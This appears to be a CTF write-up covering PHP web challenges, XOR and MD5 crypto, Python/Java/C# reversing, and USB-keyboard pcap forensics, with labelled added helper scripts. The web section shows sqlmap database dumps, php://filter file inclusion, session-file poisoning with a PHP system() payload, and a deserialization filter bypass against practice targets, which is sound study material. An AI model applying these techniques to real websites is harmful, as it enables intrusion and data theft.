This article is about 16,980 characters long; reading it takes roughly 56 minutes.
WEB
1.easy_php
```php
<?php
// The opening lines were cut off in the extracted page. The first foreach is
// reconstructed from the text, which describes a "first foreach" doing
// $$key = $$value (the second one visibly iterates $_POST, so this one is $_GET).
include "flag.php";                    // assumed: the text says $flag comes from flag.php
foreach ($_GET as $key => $value) {    // walk the GET array: $$key = $$value
    $$key = $$value;
}
foreach ($_POST as $key => $value) {   // walk the POST array: $$key = $value
    $$key = $value;
}
if ($_POST["flag"] !== $flag) {        // if the posted value differs from $flag in flag.php, die
    die($_aaa);
} else {
    echo "This is your flag : " . $flag . "\n";
    die($_bbb);
}
?>
```
The code analysis is in the comments above; in short, you POST a flag, and if it equals the original flag it gets printed.

Reference: https://www.freebuf.com/column/150731.html. This exploits a variable-overwrite vulnerability: the first foreach is used to assign the value of $flag to $_bbb, and then die($_bbb) prints the original flag value. Construct the payload:

2.Easysql
Nothing much to explain here: just throw sqlmap at it. First capture the request with Burp and save it as 2.txt:

```
python2 sqlmap.py -r 2.txt --dbs --thread 5
```

Ran through it; tried sys first and found it wasn't that database, it's the test database:

```
python2 sqlmap.py -r 2.txt -D test --tables --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag --columns --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag -C flag --dump --thread 5
```
3.lfi2rce
Opening the link shows a hint: it mentions user.php and phpinfo.php. Visiting both, phpinfo.php is accessible and gives a whole set of PHP information. index.php has a file inclusion vulnerability, `include($_POST['file']);`: post a file variable and you can get the source of the file you want. The method:

```
file=php://filter/read=convert.base64-encode/resource=user.php
```
PD9waHANCiAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgZWNobyAkX0NPT0tJRVsndXNlciddOw0KICAgICRfU0VTU0lPTlsnbmFtZSddID0gJF9DT09LSUVbJ3VzZXInXTsNCg==
Base64-decode it to get:

```php
<?php
    session_start();
    echo $_COOKIE['user'];
    $_SESSION['name'] = $_COOKIE['user'];
```

Here there is another file inclusion vulnerability via the cookie. First, analysing the code:

`echo $_COOKIE['user'];`

This requires us to supply a parameter named user, passed through the cookie.

`$_SESSION['name'] = $_COOKIE['user'];`

This assigns the value from the cookie to the session.
/var/lib/php/sessions is where the sessions are stored; the file name format is sess_ + the cookie value. Where to see the cookie value:

4stodq9feohijqk3jb9dlshjg4

This is the cookie. So the absolute path of the session file is: /var/lib/php/sessions/sess_4stodq9feohijqk3jb9dlshjg4
Now use the file inclusion in index.php to include the session file for this cookie:

bmFtZXxzOjU6ImFkbWluIjs=
==> name|s:5:"admin";

After base64-decoding the returned data, we can see the cookie we uploaded. So we can use this vulnerability to execute PHP commands. Construct a malicious username: `<?php system("ls"); ?>`

bmFtZXxzOjE4OiI8P3BocCBzeXN0ZW0oImxzIikiOw==
==> name|s:18:"<?php system("ls")";

Here the base64-decoded result differs from the parameter we uploaded; it must have been filtered. Find a way around it: URL encoding. Viewing the source, the upload now succeeded. Include the session file again via the vulnerability:

bmFtZXxzOjIyOiI8P3BocCBzeXN0ZW0oImxzIik7ID8+Ijs=
==> name|s:22:"<?php system("ls"); ?>";
Why does it still not display? I don't know why either. After an afternoon of agonizing, it occurred to me to try dropping the base64 and see what happens, so:

```
file=php://filter/read=convert/resource=/var/lib/php/sessions/sess_28sfnijqudr01hk8smaqkpblq3
```

flag{36ab1c89-82fc-4ad6-a459-8af09703d2e7}
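Added example, not part of the writeup: a small parser for the PHP session file format seen above (`key|serialized;` records), plus a check that flags string values carrying a PHP open tag, which is the condition that turns a session file into executable code once it is included (with the convert.base64-encode filter the file is only read back; a plain include executes it). The two sample records are the ones decoded on the page; the function names are my own.

```python
import re

# Constructed samples: the two session-file payloads decoded on the page.
SAMPLES = [
    'name|s:5:"admin";',
    'name|s:22:"<?php system("ls"); ?>";',
]

def parse_php_session(data):
    """Parse PHP's default session format: key|<serialized value>; ...
    Only strings (s:N:"...";) and integers (i:N;) are supported here."""
    out, pos = {}, 0
    while pos < len(data):
        bar = data.index('|', pos)          # keys cannot contain '|'
        key = data[pos:bar]
        pos = bar + 1
        if data.startswith('s:', pos):
            m = re.match(r's:(\d+):"', data[pos:])
            n = int(m.group(1))
            start = pos + m.end()
            value = data[start:start + n]    # length-prefixed: embedded quotes are fine
            if data[start + n:start + n + 2] != '";':
                raise ValueError("bad string at offset %d" % start)
            pos = start + n + 2
        elif data.startswith('i:', pos):
            m = re.match(r'i:(-?\d+);', data[pos:])
            value = int(m.group(1))
            pos += m.end()
        else:
            raise ValueError("unsupported type at offset %d" % pos)
        out[key] = value
    return out

def suspicious_values(session):
    """Keys whose value carries a PHP open tag: a session file holding such a
    value executes code if it is ever passed to include()."""
    return [k for k, v in session.items() if isinstance(v, str) and '<?' in v]

if __name__ == '__main__':
    for rec in SAMPLES:
        sess = parse_php_session(rec)
        print(sess, suspicious_values(sess))
```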
4.Babyweb
The source is as follows:

```php
<?php
// The class definition at the top was cut off in the extracted page; only
// its tail survived:
//     ...filename);
//     }
// }
function check($s) {
    // Every character we input must have an ASCII value between 32 and 125
    // (so a %00 null byte cannot be supplied).
    for ($i = 0; $i < strlen($s); $i++)
        if (!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
if (isset($_GET['exp'])) {
    $exp = (string)$_GET['exp'];
    if (check($exp)) {
        $obj = unserialize($exp);
        echo $obj;
    }
}
highlight_file(__FILE__);
```
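Added example, not the author's script: it serializes an object with one private string property the way PHP does (the property name is mangled to `\0Class\0prop`) both in the plain `s:` form and in the escaped `S:` form, and runs both through a Python port of check() above, which shows why only the escaped form gets past the byte-range filter. The class name Example is a placeholder, since the page's class definition was cut off; the property name filename is the one the writeup mentions.

```python
# Hypothetical class name; "filename" is the private property named on the page.
CLASS = "Example"
PROP = "filename"

def check(s):
    """Port of the challenge's check(): every character must be in 32..125."""
    return all(32 <= ord(ch) <= 125 for ch in s)

def serialize_private_string(cls, prop, value, escaped=False):
    """Serialize an object with a single private string property.
    PHP mangles a private name to "\\0Class\\0prop". With escaped=True the
    name uses the S: form, in which any byte may be written as \\xx (hex);
    the length field counts decoded bytes in both forms."""
    mangled = "\0" + cls + "\0" + prop
    if escaped:
        name = 'S:%d:"%s";' % (len(mangled), mangled.replace("\0", "\\00"))
    else:
        name = 's:%d:"%s";' % (len(mangled), mangled)
    val = 's:%d:"%s";' % (len(value), value)
    return 'O:%d:"%s":1:{%s%s}' % (len(cls), cls, name, val)

raw = serialize_private_string(CLASS, PROP, "flag.php")
esc = serialize_private_string(CLASS, PROP, "flag.php", escaped=True)

if __name__ == "__main__":
    print(repr(raw), check(raw))   # contains two NUL bytes -> rejected by check()
    print(esc, check(esc))         # NULs written as \00 -> accepted
```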
It's actually simple: a PHP deserialization vulnerability. What needs attention: filename here is a private property. A property declared private produces two null bytes when serialized. Normally a null byte is written as %00, but since the check() function does not allow %00 in the input, \00 must be used instead. I didn't know this, so I got stuck. The PHP script is as follows:

Here <0x00> is the null byte; if you copy it directly, pasting stops right there. Besides that, the lowercase s has to be changed to uppercase (a senior said this is a quirk of the PHP version). Sure enough, after changing it the upload worked fine. I'm so bad at this.

Crypto
1.hex
Base64-decode it, then open the result in WinHex and it's right there. You get 666c61677b35306338383535372d653165632d346131302d623439652d3034616130383764303837327d
2.xor
The source is as follows:

```python
key = "hello"
flag = "*****************************************"   # the real flag, masked in the challenge source

def pad(x, y):
    # extend y to the length of x with the padding length as the pad character
    y = y + (len(x) - len(y)) * chr(len(x) - len(y))
    return y

def xor(x1, x2):
    # character-by-character xor of two equal-length strings
    c = ''
    for i in range(len(x1)):
        c = c + chr(ord(x1[i:i+1]) ^ ord(x2[i:i+1]))
    return c

msg = xor(pad(flag, key), flag)
msg = msg.encode()
# msg = b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
```
Sorting out the idea:

pad is a constant once the lengths of flag and key are fixed. xor XORs x1 and x2 character by character. The inverse of XOR is XOR: first run pad to produce a value (string), call it M; M XORed with flag gives msg, and we want flag, so just XOR msg with M. M is constant given the flag length and the key, so the challenge is solved. The script:

```python
key = "hello"
flag = "*****************************************"   # 41 asterisks: only the length matters for pad()

def pad(x, y):
    y = y + (len(x) - len(y)) * chr(len(x) - len(y))
    return y

def xor(x1, x2):
    c = ''
    for i in range(len(x1)):
        c = c + chr(ord(x1[i:i+1]) ^ ord(x2[i:i+1]))
    return c

msg = b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
msg = msg.decode()
print(xor(pad(flag, key), msg))   # xor with the constant M recovers the flag
```
flag{a39c9cc-8157-11ea-bc55-0242ac130003}
reverse
1.Signin
Decompile it with IDA; Shift+F12 shows the flag directly.

2.

Unpack it with upx under Linux, then decompile with IDA.
3.RePY
The script is as follows:

```python
enc = [34, 44, 39, 33, 61, 34, 115, 114, 117, 118, 116, 119, 120, 107, 35, 36, 36, 119, 107, 116, 127,
       116, 37, 107, 127, 37, 37, 120, 107, 119, 127, 117, 116, 36, 119, 115, 38, 37, 36, 119, 119, 59]
for i in enc:
    # subtraction binds tighter than ^, so this is (i - 1) ^ 71
    print(chr(i - 1 ^ 71), end='')
# flag{f5632410-edd1-494c-9cc0-1934d15bcd11}
```
4.Jvav
Decompiling with jadx gives the source:

```java
package defpackage;

import java.util.Scanner;

/* renamed from: Main */
public class Main {
    public static void main(String[] args) {
        char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
        String str = new String();
        System.out.print("Please input the flag: ");
        str = new Scanner(System.in).nextLine();
        if (str.length() != 42) {
            System.out.println("Wrong!");
            return;
        }
        for (int i = 0; i < 42; i++) {
            if ((((str.charAt(i) << 3) + 1) >> 1) != enc[i]) {
                System.out.println("Wrong!");
                return;
            }
        }
        System.out.println("Right!");
    }
}
```
The important part is the last for loop: each flag character is shifted left by 3, incremented by 1, then shifted right by 1. I don't really understand the shifts in detail; just invert it in Java.
Java script:

```java
public class a1 {
    public static void main(String[] args) {
        char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
        for (int i = 0; i < 42; i++) {
            // undo the check's ((c << 3) + 1) >> 1 step by step
            System.out.print(((enc[i] << 1) - 1) >> 3);
            System.out.print(',');
        }
        System.out.println("Right!");
    }
}
```
We get a string of numbers:

101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124

Presumably these are ASCII codes, so convert them with Python:

```python
nums = [101, 107, 96, 102, 122, 51, 50, 96, 96, 100, 48, 98, 55, 44, 55, 54, 47, 98, 44, 51, 56,
        99, 47, 44, 55, 56, 52, 55, 44, 52, 50, 99, 48, 47, 53, 55, 56, 55, 55, 51, 55, 124]
for i in nums:
    print(chr(i), end='')
```

But the result is wrong:

ek`fz32``d0b7,76/b,38c/,7847,42c0/5787737|

Change the code to i+1 and it's right:

```python
nums = [101, 107, 96, 102, 122, 51, 50, 96, 96, 100, 48, 98, 55, 44, 55, 54, 47, 98, 44, 51, 56,
        99, 47, 44, 55, 56, 52, 55, 44, 52, 50, 99, 48, 47, 53, 55, 56, 55, 55, 51, 55, 124]
for i in nums:
    # the Java inversion is off by one: (8c + 1) >> 1 is 4c, so ((4c << 1) - 1) >> 3 gives c - 1
    print(chr(i + 1), end='')
```
flag{43aae1c8-870c-49d0-8958-53d106898848}
5.Sharpener
```csharp
// test.Program
// Token: 0x06000002 RID: 2 RVA: 0x000020D0 File Offset: 0x000002D0
private static void Main(string[] args)
{
    string[] enc = new string[]
    {
        "61894b21be75260c4964065b1eecec4d",
        "3cd02adb6df3f967c3acda1705bb86f1",
        "5c04925674920eb58467fb52ce4ef728",
        "ffbb466329361588defb5e30e5df168f",
        "448804aefe27492b9c183351328e7500",
        "598f5f04d65b4e0e35515b367763fee6",
        "d4398f22c157274df2d4643884db6a56",
        "37afcb75609159217c5548ed91c0ba1b",
        "28cb510090e7e926daa92745a8b02362",
        "49f01756d2edd088b64afd670400f4ac",
        "9f396fe44e7c05c16873b05ec425cbad",
        "958be1aac9d0641822a4dbaa3ad9010f",
        "82c89ed04868c75db962bb3bbe2d4b4c",
        "36f88e7b053afdaff9f9d792d142a406"
    };
    Console.Write("Please input the flag: ");
    string userInput = Console.ReadLine();
    int x = 0;
    int ul = 0;
    string tmp = "";
    if (userInput.Length != 42)
    {
        Console.WriteLine("That Wrong!");
        return;
    }
    for (int i = 0; i < userInput.Length; i++)
    {
        tmp += userInput[i].ToString();
        x++;
        if (x % 3 == 0)
        {
            if (!enc[ul].Equals(Program.GenerateMD5(tmp)))
            {
                Console.WriteLine("That Wrong!");
                return;
            }
            x = 0;
            tmp = "";
            ul++;
        }
    }
    Console.WriteLine("Right!");
}
```
Crack these MD5 values and join them; that's the flag.
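Added example, not the page's code: what the checker above computes, and why hashing unsalted 3-character chunks gives no protection. Each chunk has at most 39^3 candidates over a flag alphabet of lowercase hex-style letters, digits and `{}-`, so every hash is inverted by one exhaustive table. The hash list is copied from the decompiled program; the alphabet, the function names and the sample flag used for the self-check are my own assumptions.

```python
import hashlib
from itertools import product

# Hashes as listed in the decompiled program on the page (one per 3-char chunk).
PAGE_HASHES = [
    "61894b21be75260c4964065b1eecec4d", "3cd02adb6df3f967c3acda1705bb86f1",
    "5c04925674920eb58467fb52ce4ef728", "ffbb466329361588defb5e30e5df168f",
    "448804aefe27492b9c183351328e7500", "598f5f04d65b4e0e35515b367763fee6",
    "d4398f22c157274df2d4643884db6a56", "37afcb75609159217c5548ed91c0ba1b",
    "28cb510090e7e926daa92745a8b02362", "49f01756d2edd088b64afd670400f4ac",
    "9f396fe44e7c05c16873b05ec425cbad", "958be1aac9d0641822a4dbaa3ad9010f",
    "82c89ed04868c75db962bb3bbe2d4b4c", "36f88e7b053afdaff9f9d792d142a406",
]
# Assumed flag alphabet (CTF flags here are flag{ + hex-like text + }).
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789{}-"

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def chunk_hashes(flag, size=3):
    """What the checker computes: an MD5 per consecutive 3-character chunk."""
    return [md5_hex(flag[i:i + size]) for i in range(0, len(flag), size)]

def crack_chunks(hashes, alphabet=ALPHABET, size=3):
    """Invert each per-chunk hash by enumerating all alphabet**size strings.
    Returns None for a chunk with no preimage in the alphabet."""
    table = {}
    for cand in product(alphabet, repeat=size):
        s = "".join(cand)
        table[md5_hex(s)] = s
    return [table.get(h) for h in hashes]

def recover(hashes):
    parts = crack_chunks(hashes)
    return None if None in parts else "".join(parts)

if __name__ == "__main__":
    print(recover(PAGE_HASHES))
```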
flag{b66931c0-ec9f-4d1e-bcff-5673ce3d505b}

6.Bytecoding
This challenge is somewhat interesting: you get a text file, with the following contents:

```
  3           0 LOAD_CO
             56 LOAD_CONST              12 (44)
             58 LOAD_CONST               1 (101)
             60 LOAD_CONST              14 (48)
             62 LOAD_CONST              15 (53)
             64 LOAD_CONST               7 (98)
             66 LOAD_CONST               9 (51)
             68 LOAD_CONST              11 (56)
             70 LOAD_CONST              18 (99)
             72 LOAD_CONST               1 (101)
             74 LOAD_CONST              15 (53)
             76 LOAD_CONST               7 (98)
             78 LOAD_CONST               7 (98)
             80 LOAD_CONST               7 (98)
             82 LOAD_CONST              19 (124)
             84 BUILD_LIST              42
             86 STORE_FAST               0 (enckey)

  4          88 LOAD_GLOBAL              0 (input)
             90 LOAD_CONST              20 ('GoGoGo Input Flag: ')
             92 CALL_FUNCTION            1
             94 STORE_FAST               1 (inpt)

  5          96 LOAD_GLOBAL              1 (len)
             98 LOAD_FAST                1 (inpt)
            100 CALL_FUNCTION            1
            102 LOAD_CONST              21 (42)
            104 COMPARE_OP               3 (!=)
            106 POP_JUMP_IF_FALSE      120

  6         108 LOAD_GLOBAL              2 (print)
            110 LOAD_CONST              22 ('Wrong')
            112 CALL_FUNCTION            1
            114 POP_TOP

  7         116 LOAD_CONST               0 (None)
            118 RETURN_VALUE

  8     >>  120 SETUP_LOOP              52 (to 174)
            122 LOAD_GLOBAL              3 (range)
            124 LOAD_CONST              21 (42)
            126 CALL_FUNCTION            1
            128 GET_ITER
        >>  130 FOR_ITER                40 (to 172)
            132 STORE_FAST               2 (i)

  9         134 LOAD_FAST                0 (enckey)
            136 LOAD_FAST                2 (i)
            138 BINARY_SUBSCR
            140 LOAD_GLOBAL              4 (ord)
            142 LOAD_FAST                1 (inpt)
            144 LOAD_FAST                2 (i)
            146 BINARY_SUBSCR
            148 CALL_FUNCTION            1
            150 LOAD_CONST              23 (1)
            152 BINARY_SUBTRACT
            154 COMPARE_OP               3 (!=)
            156 POP_JUMP_IF_FALSE      130

 10         158 LOAD_GLOBAL              2 (print)
            160 LOAD_CONST              22 ('Wrong')
            162 CALL_FUNCTION            1
            164 POP_TOP

 11         166 LOAD_CONST               0 (None)
            168 RETURN_VALUE
            170 JUMP_ABSOLUTE          130
        >>  172 POP_BLOCK

 12     >>  174 LOAD_GLOBAL              2 (print)
            176 LOAD_CONST              24 ('Right')
            178 CALL_FUNCTION            1
            180 POP_TOP
            182 LOAD_CONST               0 (None)
            184 RETURN_VALUE
```
I first thought this was assembly, but it's Python bytecode.
After a look I could just about understand part of it.

```
  3           0 LOAD_CO
             56 LOAD_CONST              12 (44)
             58 LOAD_CONST               1 (101)
             60 LOAD_CONST              14 (48)
             62 LOAD_CONST              15 (53)
             64 LOAD_CONST               7 (98)
             66 LOAD_CONST               9 (51)
             68 LOAD_CONST              11 (56)
             70 LOAD_CONST              18 (99)
             72 LOAD_CONST               1 (101)
             74 LOAD_CONST              15 (53)
             76 LOAD_CONST               7 (98)
             78 LOAD_CONST               7 (98)
             80 LOAD_CONST               7 (98)
             82 LOAD_CONST              19 (124)
             84 BUILD_LIST              42
             86 STORE_FAST               0 (enckey)
```
The first block should be an array (a list) holding these values: ['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96','51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124']
```
  4          88 LOAD_GLOBAL              0 (input)
             90 LOAD_CONST              20 ('GoGoGo Input Flag: ')
             92 CALL_FUNCTION            1
             94 STORE_FAST               1 (inpt)
```

The second block decompiles to a single statement: `inpt = input("GoGoGo Input Flag: ")`
```
  5          96 LOAD_GLOBAL              1 (len)
             98 LOAD_FAST                1 (inpt)
            100 CALL_FUNCTION            1
            102 LOAD_CONST              21 (42)
            104 COMPARE_OP               3 (!=)
            106 POP_JUMP_IF_FALSE      120

  6         108 LOAD_GLOBAL              2 (print)
            110 LOAD_CONST              22 ('Wrong')
            112 CALL_FUNCTION            1
            114 POP_TOP
```

Blocks three and four are roughly

```python
if len(inpt) != 42:
    print("wrong")
```
After that I couldn't really follow it; roughly, some computation is done between inpt and enckey, and only when some condition is met is right printed. The ASCII code of f is 102, and the first value of enckey is 101, so let's see what comes out if we add 1 to each. The script:

```python
enckey = ['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96',
          '51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124']
for i in enckey:
    print(chr(int(i) + 1), end='')
```
flag{2c0af459-7ca1-4a46-b817-f16c49df6ccc}
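Added example, not from the writeup: the checker as I read it from the listing (offsets 96 to 184), which covers the part the author skipped, and its inverse. The decisive comparison is the BINARY_SUBTRACT / COMPARE_OP != sequence at offsets 134 to 156, i.e. `enckey[i] != ord(inpt[i]) - 1`; enckey is the 42-element list reconstructed above, and the function names are my own.

```python
# enckey as reconstructed on the page from the BUILD_LIST of 42 constants.
ENCKEY = [101, 107, 96, 102, 122, 49, 98, 47, 96, 101, 51, 52, 56, 44, 54, 98, 96, 48, 44, 51, 96,
          51, 53, 44, 97, 55, 48, 54, 44, 101, 48, 53, 98, 51, 56, 99, 101, 53, 98, 98, 98, 124]

def check(inpt):
    """Source reconstructed from the listing (offsets 96-184):
    len(inpt) != 42 -> 'Wrong'; then for each i, enckey[i] != ord(inpt[i]) - 1
    -> 'Wrong'; otherwise 'Right'. Returns the word the program would print."""
    if len(inpt) != 42:
        return 'Wrong'
    for i in range(42):
        if ENCKEY[i] != ord(inpt[i]) - 1:
            return 'Wrong'
    return 'Right'

def recover(enckey=ENCKEY):
    """Invert the comparison: each accepted character is enckey[i] + 1."""
    return ''.join(chr(k + 1) for k in enckey)

if __name__ == '__main__':
    import dis
    dis.dis(check)   # compare with the listing; opcode names differ across Python versions
    print(recover(), check(recover()))
```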
Misc
1.Sign-in

Follow the official account and reply zjnuctf to get the flag.

2.The real sign-in

The download is a Word document; reveal the hidden text and you get the flag.

3.Do you know Han Xin Code?

Found the four corner patterns online, stitched them on, and got the image.

4.Keyboard

References: https://www.cnblogs.com/hackxf/p/10670844.html https://blog.csdn.net/qq_36609913/article/details/78578406

Now run the following under Linux:

```
tshark -r keyboard.pcapng -T fields -e usb.capdata > usbdata.txt
```
You get a pile of numbers: each line has 16 hex digits, two digits per byte, so 8 bytes. The third byte is the letter corresponding to the key that was pressed. The lookup table is the normalKeys / shiftKeys dictionaries in the script below.
After the third byte, look at the first: sometimes it's 0, sometimes 2. Blind guess: when the first byte is 2, shift is held. Checked it, and the first few characters are exactly flag{
```python
# USB HID keycode (hex) -> character, without and with shift
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h",
              "0c": "i", "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p",
              "14": "q", "15": "r", "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x",
              "1c": "y", "1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6",
              "24": "7", "25": "8", "26": "9", "27": "0", "28": "", "29": " ", "2a": " ", "2b": "\t",
              "2c": "", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\", "32": " ", "33": ";",
              "34": "'", "35": " ", "36": ",", "37": ".", "38": "/", "39": " ", "3a": " ", "3b": " ",
              "3c": " ", "3d": " ", "3e": " ", "3f": " ", "40": " ", "41": " ", "42": " ", "43": " ",
              "44": " ", "45": " "}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H",
             "0c": "I", "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P",
             "14": "Q", "15": "R", "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X",
             "1c": "Y", "1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^",
             "24": "&", "25": "*", "26": "(", "27": ")", "28": " ", "29": " ", "2a": " ", "2b": "\t",
             "2c": "", "2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|", "32": " ", "33": "\"",
             "34": ":", "35": " ", "36": "<", "37": ">", "38": "?", "39": " ", "3a": " ", "3b": " ",
             "3c": " ", "3d": " ", "3e": " ", "3f": " ", "40": " ", "41": " ", "42": " ", "43": " ",
             "44": " ", "45": " "}

flag = ''
with open('usbdata.txt', 'r') as f:
    for i in range(200):
        l = f.readline()
        if not l:                 # end of file reached before 200 lines
            break
        if l[4:6] == '00':        # third byte 00: key release, nothing typed
            continue
        elif l[0] == '2':         # modifier byte starting with 2: shift held
            flag += shiftKeys[l[4:6]]
        elif l[0] == '0':
            flag += normalKeys[l[4:6]]
        else:
            continue
print(flag)
# flag{4565fd58-c9b2-4544-86f7-872e38433467}
```
Because I didn't know how many lines there were, I just ran it for extra iterations; Python stops automatically when it hits an error.
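Added example, not the author's script: a decoder for the same tshark output that tests the shift bits of the modifier byte (0x02 left shift, 0x20 right shift) instead of its first hex digit, skips release reports, and collapses a key that stays down and therefore repeats across consecutive reports. The sample lines are constructed, and the key map is deliberately limited to letters, digits and a few symbols.

```python
# Constructed sample of tshark's usb.capdata output: 16 hex digits per line,
# one 8-byte boot-keyboard report each. Sequence: F (left shift), release,
# l held for two reports, release, 1, release, ! (right shift), release,
# { (left shift + [), release.
SAMPLE = """\
0200090000000000
0000000000000000
00000f0000000000
00000f0000000000
0000000000000000
00001e0000000000
0000000000000000
20001e0000000000
0000000000000000
02002f0000000000
0000000000000000
"""

LETTERS = "abcdefghijklmnopqrstuvwxyz"
NORMAL = {0x04 + i: c for i, c in enumerate(LETTERS)}
NORMAL.update({0x1e + i: c for i, c in enumerate("1234567890")})
NORMAL.update({0x2c: " ", 0x2d: "-", 0x2e: "=", 0x2f: "[", 0x30: "]"})
SHIFT = {0x04 + i: c.upper() for i, c in enumerate(LETTERS)}
SHIFT.update({0x1e + i: c for i, c in enumerate("!@#$%^&*()")})
SHIFT.update({0x2c: " ", 0x2d: "_", 0x2e: "+", 0x2f: "{", 0x30: "}"})

def decode_reports(text):
    """Decode boot-protocol keyboard reports: byte 0 is the modifier bitmap
    (0x02 left shift, 0x20 right shift), byte 2 the first pressed keycode.
    A held key is repeated in consecutive reports, so only transitions count."""
    out, prev = [], None
    for line in text.split():
        report = bytes.fromhex(line)
        if len(report) != 8:
            raise ValueError("unexpected report length: %r" % line)
        mod, key = report[0], report[2]
        if key == 0 or key == prev:      # release, or the same key still held
            prev = key
            continue
        table = SHIFT if mod & 0x22 else NORMAL
        out.append(table.get(key, "?"))   # unknown keycodes are marked, not dropped
        prev = key
    return "".join(out)

if __name__ == "__main__":
    print(decode_reports(SAMPLE))
```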
5.有趣的Minecraft
Open the image in WinHex; at the very end there is a line of base64, which decodes to cnserver.bi0x.cn

Open the game and join the server. flag{22a61e26-6a6c-4130-a39a-15f0ce5c15fc}
6.zip
The password is UVWHZAITWAU.

The picture contains four kinds of cipher: the first is MIMIMOYS, the second is the Galactic alphabet, the third is flag semaphore, and the fourth is bird totems. I don't know what the first and fourth are, but that doesn't stop me from brute-forcing. Looking them up in the tables gave HZAIYQ for the middle letters; the first three and the last two I just guessed and brute-forced. The dictionary-generation script:

```python
known = 'HZAITQ'                         # the six letters read off the tables
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
print(len(letters))
# three unknown letters before the known part, two after: 26**5 candidates
# (the original had a sixth, unused loop that only multiplied the run time by 26)
with open("pass.txt", "a") as f:
    for i in letters:
        for j in letters:
            for k in letters:
                for l in letters:
                    for m in letters:
                        f.write(i + j + k + known + l + m + "\n")
```
It ran for quite a while, but it wasn't right; I checked carefully and it was still wrong. So one of the six known letters must be wrong. I first guessed only one was off; trying six times took quite a while, and finally I found that the last of the known six was wrong: it's W. orz Then open the archive and you get the flag.

7.Interesting video
flag:000{w3lc0me_1337_players_and_good_luck_with_the_game}
Here it's Morse code; the code is .-/-./-.., which translates to and.

Here it's semaphore, which translates to the.

Run the command on Linux to get game.

Altogether: 000{w3lc0me_1337_players_and_good_luck_with_the_game}